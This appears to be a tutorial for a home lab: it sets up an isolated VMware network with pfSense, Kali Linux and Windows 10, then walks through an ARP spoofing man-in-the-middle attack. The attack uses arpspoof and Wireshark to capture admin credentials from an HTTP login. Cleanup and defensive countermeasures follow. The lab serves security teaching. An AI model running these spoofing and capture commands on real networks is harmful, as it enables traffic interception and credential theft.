Simulating an ARP Spoofing Attack

An ARP spoofing attack (ARP poisoning) occurs when an attacker sends fake Address Resolution Protocol (ARP) messages on a local network to associate their own MAC address with the IP address of a legitimate device. This 'poisons' the ARP cache of other devices, tricking them into sending their network traffic to the attacker instead of the intended recipient. The attacker can then intercept, alter, or block this traffic, often leading to man-in-the-middle (MITM) attacks, session hijacking, or denial-of-service (DoS) attacks.

Lab Topology

The lab topology consists of three main components: a victim machine running a standard Windows 10 OS, an attacker machine running Kali Linux, and a gateway/router running pfsense that both machines connect to. The attacker uses ARP spoofing to position themselves between the victim and the gateway, intercepting all traffic that flows between them. This man-in-the-middle position allows the attacker to capture sensitive data, modify packets, or perform other malicious activities without the victim's knowledge.

Network Configuration

Virtual Switch: VMnet 2 (Host-Only)

Subnet: 192.168.10.0/24

All machines are connected to this isolated virtual switch to prevent traffic from escaping to the public internet.

Lab Components

Gateway: pfSense
IP = 192.168.10.1

Attacker: Kali Linux
IP = 192.168.10.100

Victim: Windows 10
IP = 192.168.10.101

Normal Traffic Movement

Traffic Movement after ARP Poisoning

Hardware Requirements

Minimum Hardware Requirements

CPU: 4 physical cores / 8 threads with virtualization support enabled (Ideally 6+ physical /12+ threads)

◦ Follow this video to check if virtualization is enabled/disabled and how to enable it Here

RAM: 12 GB (Ideally 16 GB)

Storage: 120 GB free (Ideally SSD for faster load times)

Host OS: 64-bit Windows or Linux host capable of running VMware Workstation Pro 25H2

My Hardware

CPU: 8 physical cores / 16 threads with virtualization support enabled

RAM: 32 GB

Storage: 140 GB free SSD

Host OS: Windows 11 Pro Version 25H2 (64-bit)

Steps

Prepare the Virtual Environment

Setup the Gateway

Setup the Attacker

Finalizing Gateway Setup

Prepare the Virtualization Environment

Download VMware

Create a Broadcom Account
1. Go to the website Here, you should see the "User Registration" Page
2. You'll have to enter an email address you can verify, but you can use temp-mail (https://temp-mail.org/) if you don't want to use your personal Email.
3. After Verifying your Email, you will now be prompted to complete your registration.
4. You can fill in random values in the fields but save your password (You should now see "Registered Successfully").
5. Click the "I'll do it later" button when prompted to setup your Account.
Accessing VMware Download
1. With your newly created Broadcom Account, Login Here.
2. After successfully logging in, go to this page.
3. On the Free Downloads page, Select VMware Workstation Pro.
4. Then Select VMware Workstation Pro 25H2 for either Linux or Windows (Depending on your OS).
5. Select the most recent release of that Version.
Enabling Download for VMware
1. You should now see a Download button for VMware but you probably are blocked from clicking it - that's to be expected.
2. Open up the Terms and Conditions on the Left side of the screen, and then select the checkbox to accept them (Unless if you don't).
3. Now click the download icon on the right side of the screen, and you should be prompted for additional verification.
4. You can put all random values in these fields, and then submit.
5. Now you can click the download icon and it should start to download. (Circled below)
VMWare Installer
1. After the VMware Installer download completes, you can now open it. The file should be named VMware-Workstation-Full-25H2 -...-.exe
2. When Setup Wizard opens up click Next, Accept the Terms in the License agreement and click Next.
3. You may see a "Compatible Setup" page that says "Hyper-V is not detected on the host." That's okay, click Next.
4. On the Custom Setup Page click Next, and you can uncheck the boxes on the User Experience settings if you would like(I did) and click Next.
5. Leave the Desktop Shortcut for easy access, and then click Next, and then click Install(Finally).
Great Job! You have successfully installed VMware Workstation Pro!

Video Tutorial:

Configure VMware

Open VMware and access Virtual Network Editor
1. Run your VMware application (click the desktop icon or press the Windows Key and type "VMware").
2. Select the Edit Menu at the top of the page and click "Virtual Network Editor...".
3. Click Change Settings in the bottom right corner of the Virtual Network Editor.
4. You'll be prompted to "allow the app to make changes to your device," click Yes.
Configure VMnet2 as Host-Only Network
1. Click "Add Network..."
2. Make sure Vmnet2 is selected for "Select a network to add:", Click Ok.
3. With VMnet 2 selected, under "VMnet Information" select "Host-Only"
4. Make sure "Connect a host virtual adapter to this network" is checked
5. Uncheck "Use local DHCP service to distribute IP address to VMs" - pfSense will handle DHCP for the lab.
Setup the Subnet
1. In the "Subnet IP:" section, set it to 192.168.10.0
2. In the "Subnet Mask:" section, set it to 255.255.255.0
3. Click OK. Double check to make sure you have all the correct configurations as the image below.
4. The Network is now isolated and configured for the lab.

Setup the Gateway

Download pfSense

Access pfSense Download
1. Go to the pfSense download page Here, and click "Download"
2. You should be redirected to the Netgate Installer. Under the "Installation Image" dropdown, select the "AMD ISO IPMI/Virtual Machines" and add it to your cart.
3. Go to your cart, and click Checkout. You'll have to create a Netgate account if you don't have one already, but you can use temp-mail for this as well.
4. After creating your account, filling in a billing address (you can put any values in this form) and clicking Complete Order, you should see a "Download Now" button after ~ 20 seconds, click it.
Extracting the Download
1. After downloading the zipped pfSense file, you'll now need to extract it.
2. When you extract it (with 7zip/WinRar) Make sure you run the zip extractor as administrator - you'll run into issues if you don't.
3. I used 7zip to extract the pfSense folder and I made a dedicated "Virtual Machines" folder for this lab - I recommend doing the same.
4. When unzipping the file(as administrator) you may come across the conflict "There is a file with the same name in this location." When this occurs, select the checkbox for "Do this for all files" and select "Copy and Replace."

Setup pfSense Virtual Machine

Create a new Virtual Machine for pfSense on VMware
1. In VMware select "File" and click "New Virtual Machine..."
2. The New Virtual Machine Wizard should show up, Select "Custom (advanced)" and click Next.
3. In "Choose the Virtual Machine Hardware Compatibility", you can leave the default selection of "Workstation 25H2", Click Next
4. For the "Guest Operating System Installation, select "I will install the operating system later" and click Next.
5. Under "Select a Guest Operating System," Select "Other" and for the version select "FreeBSD 14 64-Bit" and click Next. (This is the operating system pfSense will run on)
6. In "Name the Virtual Machine," you can give the VM whatever name you want, I went with "pfSense-Router".
7. Select the location to save your VM, I would recommend saving all of the Virtual Machines for VMware in the same folder (separate from the folder where you save the VM downloads).
8. Under "Processor Configuration" Select 1 processor and 1 cores per processor (The gateway doesn't need much processing power), click next.
9. In "Memory for the Virtual Machine" I would recommend 1024 MB, however you can select 512 MB if you are strapped for memory, click next.
Setup the Networking for pfSense
1. Under "Network Type," select NAT networking and click next (this is required to download pfsense onto the VM).
2. In "Select I/O Controller Types" select LSI Logic SAS, click next.
3. In "Select a Disk Type," select IDE and click next. Then, in "Select a Disk," select Create a new virtual disk and click next.
4. Under "Specify Disk Capacity," set the maximum disk size to 16 GB (This is not the actual size of the file - just the maximum size it could grow to), do not allocate all space now (leave it unchecked), and select "Store Virtual disk as a single file" for better performance.
5. At "Specify Disk File," you can leave the default value and click next (It should say "FreeBSD 14 64-bit.vmdk").
Customizing the hardware for pfSense
1. You should now be at the "Ready to Create Virtual Machine" screen, click "Customize Hardware..."
2. Now, on the "Hardware" screen, click "Add..." and select Network Adapter under the "Hardware types:" section and click Finish.
3. With Network Adapter 2 selected, under the Network connection section, select Custom and select "VMnet2 (Host-only)" from the dropdown list.
4. Now Select "New CD/DVD (IDE)" and for the under "Connection" select "Use ISO image" amd select your pfSense .iso file. (It should be named something like "netgate-installer-v1.1-RELEASE-amd64.iso")
5. Now you can select Sound Card and click remove, and select the USB Controller and click remove (They're unnecessary for our pfSense VM)
6. Close the Hardware Window and click Finish
Install pfSense on the new Virtual Machine
1. You should now see a black screen saying pfsense-Router in VMware, click "Power on this virtual machine". (Click ok on the popup)
2. Accept the Copyright for pfsense,

Initial pfSense LAN Configuration

Configure the pfSense LAN interface
1. After pfSense boots up, you should see the pfSense console menu with several options.
2. Enter option 2 (Set interface(s) IP address).
3. Enter 2 for LAN (interface em1).
4. When asked "Configure IPv4 address LAN interface via DHCP?" type n and press Enter.
5. Enter the new LAN IPv4 address: 192.168.10.1 and press Enter.
6. Enter the new LAN IPv4 subnet bit count: 24 and press Enter.
7. For the upstream gateway address, press Enter (leave blank - this is for a LAN, not WAN).
8. When asked "Configure IPv6 address LAN interface via DHCP6?" type n and press Enter.
9. For the new LAN IPv6 address, press Enter (leave blank).
10. For the new LAN IPv6 subnet bit count, press Enter (leave blank).
Enable DHCP Server on LAN
1. When asked "Do you want to enable the DHCP server on LAN?" type y and press Enter.
2. Enter the start address of the IPv4 client address range: 192.168.10.100 and press Enter.
3. Enter the end address of the IPv4 client address range: 192.168.10.200 and press Enter.
4. When asked "Do you want to revert to HTTP as the webConfigurator protocol?" type n (we'll configure this later).
5. You should now see a message saying "You can now access the webConfigurator by opening the following URL in your web browser: https://192.168.10.1/"

Setup the Attacker

Download Kali Linux

Access the Kali Linux Download
1. Go to the Kali Linux download page here.
2. Click the download button for VMware (it should be a .7z file).
3. Wait for the download to complete - the file is fairly large (several GB).
Extract the Kali Linux File
1. After downloading, extract the compressed file to your Virtual Machines folder (the same location where you're storing your other VMs).
2. Make sure to use 7zip or WinRAR to extract the .7z file.
3. The extracted folder should contain a .vmx file (something like kali-linux-2025.3-vmware-amd64.vmx).

Configure Kali Linux VM

Import Kali Linux into VMware
1. In VMware, go to File > Open.
2. Navigate to your extracted Kali Linux folder and select the .vmx file.
3. Click Open. The Kali Linux VM should now appear in your VMware Library.
Configure Network Settings (CRITICAL - Do NOT power on yet)
1. Right-click the Kali Linux VM and select "Settings..."
2. Select "Network Adapter" from the hardware list.
3. Under "Network connection," select "Custom: Specific virtual network" and choose "VMnet2 (Host-only)" from the dropdown.
4. Click OK to save the changes.
Power On and Verify
1. Now you can power on the Kali Linux VM.
2. Login with username: kali and password: kali
3. Open a terminal and run ip a to verify the network configuration.
4. You should see interface eth0 with an IP address like 192.168.10.100/24 (the first IP from pfSense's DHCP range).
Test Network Connectivity
1. In the terminal, run ping -c 4 192.168.10.1 to test connectivity to the pfSense gateway. You should receive all 4 packets.
2. Run ping -c 4 8.8.8.8 to test internet connectivity. You should receive 0 packets - this confirms the network is isolated as intended.

Finalizing Gateway Setup

Login to pfSense webConfigurator

Access pfSense from Kali Linux
1. On the Kali Linux VM, open Firefox.
2. Navigate to https://192.168.10.1/
3. You'll see a security warning - this is expected because the certificate is self-signed. Click "Advanced" and then "Accept the Risk and Continue."
4. Login with username: admin and password: pfsense
Complete Initial Setup Wizard
1. After logging in, you'll see a warning about the default password being insecure. You can ignore this for now or change it later.
2. Click "Next" on the pfSense Setup welcome screen.
3. Click "Next" on the Netgate Global Support page.
General Information
1. Hostname: Leave as pfSense (default).
2. Domain: Enter lab.local
3. Primary DNS server: Enter 8.8.8.8 (Google's public DNS).
4. Secondary DNS server: Leave blank.
5. Uncheck "Override DNS" and click Next.
Time Server Information
1. Time server hostname: Enter 0.pfsense.pool.ntp.org 1.pfsense.pool.ntp.org 2.pfsense.pool.ntp.org (separated by spaces, no space before the first one).
2. Timezone: Select your local timezone (e.g., "America/Louisville").
3. Click Next.
Configure WAN Interface
1. Configuration Type: Select "DHCP"
2. Leave MAC Address blank.
3. Leave MTU/MSS blank (pfSense will use defaults).
4. Leave DHCP Hostname blank.
5. Under "RFC1918 Networks," uncheck "Block RFC1918 Private Networks" (important for VMware NAT).
6. Leave "Block bogon networks" checked.
7. Click Next.
Configure LAN Interface
1. LAN IP Address: Leave as 192.168.10.1
2. Subnet Mask: Leave as 24
3. Click Next.
Change Admin Password (Optional but Recommended)
1. Even though the network is isolated, it's good practice to change the default password.
2. Enter a new password (e.g., pfSenseLab123!).
3. Confirm the password.
4. Click Next.
Reload Configuration
1. Click the "Reload" button.
2. You should see "Congratulations! pfSense is now configured."
3. Click "Finish."

Change webConfigurator Traffic Protocol

Enable Unencrypted HTTP Access
1. In Firefox on the Kali Linux VM, navigate to https://192.168.10.1/
2. Login with username: admin and your new password (e.g., pfSenseLab123!).
3. Go to System > Advanced.
4. Click on the "Admin Access" tab.
Configure HTTP Protocol
1. Under "Protocol," change it from "HTTPS" to "HTTP"
2. Uncheck "WebGUI redirect"
3. Uncheck "Anti-lockout rule"
4. Scroll down and click "Save"
Verify Changes
1. You should see a green bar saying "Changes were saved successfully."
2. After about 20 seconds, you should be redirected to the login page.
3. You can now access pfSense via http://192.168.10.1/ (without the 's').

Setup the Victim

Download Windows 10

Create Windows 10 Installation Media
1. Go to the Windows 10 download page here.
2. Click "Download tool now" under "Create Windows 10 installation media."
3. Open the MediaCreationTool22H2.exe file and click "Allow" when prompted.
Create ISO File
1. Accept the license terms and click "Accept."
2. Select "Create installation media (USB flash drive, DVD, or ISO file) for another PC" and click "Next."
3. Keep the default language, architecture, and edition settings and click "Next."
4. Choose "ISO file" and click "Next."
5. Save the ISO file to your Virtual Machines folder (same location as your other VM files).
6. Wait for the download and ISO creation to complete.
7. When it says "Burn the ISO file to a DVD," click "Finish" (you don't need to burn it).

Setup Windows 10 in VMware

Create the Virtual Machine
1. In VMware, go to File > New Virtual Machine.
2. Select "Typical (recommended)" and click "Next."
3. For "Guest Operating System Installation," select "Installer disc image file (iso)" and browse to your Windows.iso file. Click "Next."
4. For "Name the Virtual Machine," you can keep it as "Windows 10 x64" or choose your own name.
5. Choose the location to save the VM (in your Virtual Machines folder).
6. Set maximum disk size to 60 GB and select "Store virtual disk as a single file." Click "Next."
Customize Hardware
1. Click "Customize Hardware..."
2. Memory: Set to 4096 MB (4 GB).
3. Processors: Set to 2 processors, 1 core each.
4. Network Adapter: Select "Custom: Specific virtual network" and choose "VMnet2 (Host-only)."
5. Remove the USB Controller (click it and press "Remove").
6. Close the Hardware window. Important: Uncheck "Power on this virtual machine after creation" and click "Finish."
Configure Boot Order
1. With your Windows 10 VM selected in VMware, go to VM > Power > Power On to Firmware.
2. Use arrow keys to highlight "Enter Setup" and press Enter.
3. Navigate to "Configure Boot Options" and press Enter.
4. Select "Change Boot Order" and press Enter.
5. Select "Change the order" and press Enter.
6. Use the arrow keys to highlight "EFI VMware Virtual SATA CDROM Drive (1.0)" and press "+" to move it to the top of the list. Press Enter.
7. Select "Commit Changes and Exit" and press Enter.
8. Select "Boot Normally" and press Enter.
Install Windows
1. Press any key quickly when prompted to "boot from CD/DVD."
2. You should now see the Windows Setup screen.
3. Keep the language, time, and keyboard defaults (or change as preferred) and click "Next."
4. Click "Install Now."
5. Select "I don't have a product key" (this is fine for a temporary lab VM).
6. Select "Windows 10 Pro" as the operating system (it has more features useful for testing) and click "Next."
7. Check the box to accept the license terms and click "Next."
8. Select "Custom: Install Windows only (advanced)."
9. Select "Drive 0 Unallocated Space" and click "Next."
10. Wait for Windows to install - the VM will restart several times (this is normal).

Windows 10 Account Setup

Initial Configuration
1. After Windows restarts, select your region (e.g., "United States") and click "Yes."
2. Select your keyboard layout (e.g., "US") and click "Yes."
3. Click "Skip" when asked to add a second keyboard layout.
Setup Offline Account
1. On the "How would you like to set up?" screen, select "Set up for personal use" and click "Next."
2. Click "Offline account" in the bottom left corner.
3. Click "Limited experience" in the bottom left corner.
Create Local Account
1. For "Who's going to use this PC?" enter: windows-victim and click "Next."
2. Enter password: windows-victim and click "Next."
3. Confirm password: windows-victim and click "Next." 4 You'll need to create 3 security questions. Since this is a lab, the answers don't matter. For example:
  - What's the name of the first school you attended? yale
  - What was your childhood nickname? eppy
  - What's the name of the city where you were born? boston
4. Click "Next" after each question.
Privacy Settings
1. Turn off all privacy settings (Location, Diagnostics, Tailored experiences, etc.).
2. Click "Accept."
3. Click "Skip" on "Let's Customize your experience."
4. Click "Not Now" on the Cortana page.
Install VMware Tools
1. Once Windows loads, you should see a yellow bar at the bottom saying "Install Tools." Click it.
2. If you don't see the yellow bar, go to VM > Install VMware Tools in the VMware menu.
3. Open File Explorer > This PC > Double-click the "VMware Tools" DVD drive.
4. Click "Yes" on the VMware installation launcher.
5. In the VMware Tools Setup, click "Next."
6. Select "Typical" setup and click "Next."
7. Click "Install."
8. When prompted to restart, click "Finish" and then "Yes" to restart the VM.
Verify Network Configuration
1. After the VM restarts, open Command Prompt (press Windows key, type "cmd," press Enter).
2. Run ipconfig and verify:
  - DNS Suffix: lab.local
  - IPv4 Address: 192.168.10.101 (or similar - the next available IP from pfSense DHCP)
  - Subnet Mask: 255.255.255.0
  - Default Gateway: 192.168.10.1
3. Run ping 192.168.10.1 - you should receive all 4 packets.
4. Run ping 8.8.8.8 - you should receive 0 packets (confirms isolation).
Setup Microsoft Edge
1. Open Microsoft Edge and go through the initial setup.
2. Select "Start without your data."
3. Uncheck "Bring over your data."
4. Uncheck "Make your Microsoft experience more useful to you."
5. Click through any remaining setup steps.

Launch the Attack

Prepare the Attack Environment

Disable Screen Saver on Kali Linux
1. On the Kali Linux VM, go to Settings > Power Manager.
2. Set "Blank after" to "Never" to prevent the screen from locking during the attack.
Verify IP Addresses
1. Windows 10 VM: Run ipconfig in Command Prompt - should show 192.168.10.101
2. Kali Linux VM: Run ifconfig in terminal - should show 192.168.10.100 on eth0
3. pfSense Gateway: Confirm 192.168.10.1 via the webConfigurator
Configure Kali Linux as a Router
1. Open a terminal in Kali Linux.
2. Run: sudo sysctl -w net.ipv4.ip_forward=1
3. Enter password: kali
4. You should see output: net.ipv4.ip_forward = 1

Execute ARP Spoofing

Poison the Victim's ARP Table
1. Open a second terminal in Kali Linux.
2. Run: sudo arpspoof -i eth0 -t 192.168.10.101 192.168.10.1
1. You should start seeing "arp reply" messages continuously.
Poison the Gateway's ARP Table
1. Switch back to the first terminal.
2. Run: sudo arpspoof -i eth0 -t 192.168.10.1 192.168.10.101
1. You should start seeing "arp reply" messages in this terminal as well. The Man-in-the-Middle is Now Active
Start Packet Capture
1. Open a third terminal in Kali Linux.
2. Run: sudo wireshark
3. Wireshark should launch with the interface selection screen.
4. Double-click on "eth0" to start capturing on that interface.
5. You should now see packets being captured in real-time.

Create The Bait

Access webConfigurator on the Victim

Generate Unencrypted Traffic
1. Switch to the Windows 10 VM.
2. Open Microsoft Edge.
3. Navigate to: http://192.168.10.1/
1. You should see the pfSense login page.
Enter Credentials
1. Username: admin
2. Password: pfSenseLab123! (or whatever password you set)
3. Click "Sign in"
Stop Wireshark Capture
1. Now, switch back to your Kali Linux VM.
2. In the Wireshark window, click the red square button to stop the capture.

Analyze the Traffic

Filter Captured Packets

Apply HTTP POST Filter
1. In Wireshark's filter bar (at the top), type: http.request.method == POST
2. Press Enter to apply the filter.
1. You should see one or more POST requests in the packet list.
Examine the POST Request
1. Click on the first POST request in the packet list.
2. The Info column should show something like: POST / HTTP/1.1 (application/x-www-form-urlencoded)

Extract Login Credentials

View Form Data
1. In the packet details pane (bottom section), expand the section labeled "HTML Form URL Encoded: application/x-www-form-urlencoded"
2. You should now see multiple form items, including:
  - Form item: usernamefld = admin
  - Form item: passwordfld = pfSenseLab123! Success! You have successfully captured sensitive login credentials using ARP spoofing!

Next Steps

Revert Attacker Settings

Stop ARP Spoofing
1. In both terminals running arpspoof on Kali Linux, press Ctrl+C to stop the attacks.
2. The victim and gateway will gradually restore their correct ARP tables.
Disable IP Forwarding (Optional)
1. Run: sudo sysctl -w net.ipv4.ip_forward=0
2. This disables packet forwarding on Kali Linux.
Clear ARP Cache on Windows (Optional)
1. On the Windows 10 VM, open Command Prompt as Administrator.
2. Run: netsh interface ip delete arpcache
3. This clears the poisoned ARP entries.

Defensive Countermeasures

Understanding the Attack
Real-World Protections
- Always use HTTPS for sensitive websites
- Implement static ARP entries for critical devices
- Use network monitoring tools to detect ARP spoofing
- Enable port security on network switches
- Consider implementing 802.1X authentication
- Use VPNs for additional encryption layers

Troubleshooting

Verify VMware

Check Virtual Network Editor
1. In VMware, go to Edit > Virtual Network Editor.
2. Click "Change Settings" if needed.
3. Select VMnet2 and verify:
  - Type: Host-only
  - "Connect a host virtual adapter to this network" is checked
  - "Use local DHCP service to distribute IP addresses to VMs" is unchecked
  - Subnet IP: 192.168.10.0
  - Subnet Mask: 255.255.255.0

Verify pfSense VM

Check pfSense Configuration
1. In Kali Linux, open Firefox and navigate to http://192.168.10.1/
2. Login and verify:
  - System > General Setup: Domain is lab.local
  - System > Advanced > Admin Access: Protocol is HTTP
  - Interfaces > LAN: IP address is 192.168.10.1/24
  - Services > DHCP Server: DHCP range is 192.168.10.100 to 192.168.10.200

Verify Kali Linux VM

Test Network Connectivity
1. Open a terminal in Kali Linux.
2. Run ifconfig - should show eth0 with IP 192.168.10.100
3. Run ping -c 4 192.168.10.1 - should receive all 4 packets
4. Run ping -c 4 8.8.8.8 - should receive 0 packets (confirms isolation)
Check VM Settings
1. With Kali VM powered off, right-click and select Settings.
2. Verify Network Adapter is set to "Custom: VMnet2 (Host-only)"

Verify Windows 10 VM

Test Network Connectivity
1. Open Command Prompt.
2. Run ipconfig and verify:
  - DNS Suffix: lab.local
  - IPv4 Address: 192.168.10.101 (or similar)
  - Subnet Mask: 255.255.255.0
  - Default Gateway: 192.168.10.1
3. Run ping 192.168.10.1 - should receive all 4 packets
4. Run ping 8.8.8.8 - should receive 0 packets (confirms isolation)
Reset Network if Needed
1. If connectivity issues occur, run in Command Prompt (as Administrator):
  - ipconfig /flushdns
  - ipconfig /release
  - ipconfig /renew
  - netsh interface ip delete arpcache
Check VM Settings
1. With Windows VM powered off, right-click and select Settings.
2. Verify Network Adapter is set to "Custom: VMnet2 (Host-only)"